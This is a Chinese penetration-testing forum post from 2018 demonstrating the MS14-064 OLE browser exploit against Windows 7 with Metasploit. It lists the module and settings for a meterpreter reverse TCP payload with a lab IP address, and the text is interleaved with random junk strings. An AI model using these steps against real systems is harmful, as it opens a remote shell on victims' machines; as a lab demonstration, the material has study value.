中国网络渗透测试联盟

标题: MS14-064 漏洞测试入侵win7 [打印本页]
作者: admin    时间: 2018-10-20 20:20
标题: MS14-064 漏洞测试入侵win7

" f3 L5 o; D7 I& V8 ^. A 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示/ i" W3 z! R9 q0 s

8 l# g( g9 O. m) J9 }

. X' d$ S, |% z9 x# L 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 0 |. m# e" v3 p; D& }

) G2 C* n7 z( h( h+ y/ V

8 _$ { H9 s2 f9 y' G 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp 4 e( r: s' R0 s

( l) Y9 B M5 [. x1 \3 Z

# g0 r; v, Z' R3 ^; G; _& _             set AllowPowershellPrompt true) `8 s, a# v& C# `/ R+ b. H

v/ V% |+ C# e: H

5 K" R3 n1 _- ^' `9 f             Set LHOST 192.168.0.109 H- C4 [. L- Q6 V# O, U1 d1 A$ }

. m3 e- f( w* {$ d; L: |

1 ?3 d: w, r0 [, _5 ~             set SRVHOST 192.168.0.109 Z1 p, d7 r) u2 H7 i

/ r! i6 H3 Q0 k! z& H8 |" ^

# }: W5 ^1 a; W" h$ M             Set uripath share , r5 v- |9 U7 R! q' P

* D4 E7 D6 ?+ Z& A& Z6 _! w+ \

; O' P# ?6 Z- U( {" X: ^             Set srvport 804 `( d; v7 g5 B4 j

; C. q9 f4 Z+ T. w7 n

% d( C9 _: Z. _# x& Y, O0 K& S  + k9 T: L H% H3 R

9 E M; {5 m( h2 x; }

; f+ O2 G3 K4 P' {: {" J  & N1 W; @" I3 f0 t. z, c) V/ d9 C. O* F/ P

: _9 a% Q! m2 d' M- \

7 @& ?5 c( h" K( D. g0 K* ^; `) g  ! f# Y9 C" H! c, C5 y" U5 P; T

& x. a% K, J7 k4 }0 G" s9 r- m

8 | g- l( J% _" H& L   ) f7 r9 Z0 v8 V" o: z

. J& ~, s5 @8 L

! ~) q" x2 _; e$ `0 A  : E. T* V2 o _2 q, i [; Z: a

5 D' G$ M! H8 i0 p' D( i

$ v# s0 r2 U$ l+ f' ^- F$ ? 下面我们来访问本地地址如图:+ Y% s0 j' _! L' U8 A

( I1 x: f* P* V% V5 c: [2 V. C# d

8 ]& k8 ~ C7 i$ Y0 k) z6 @   6 |& V* W7 O) U$ X' e

" F- b$ V# C# a" B* Y

5 f% A3 l. k0 a; P" @- ]( C' K5 z   K& F# B6 j4 D5 j. |3 C" P n

% e' V4 X3 o9 j8 z; p$ ^+ f

- L; M j! Q# p7 x9 ~ ( h: k h# @0 T, f: p; ?! Z- H3 G





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2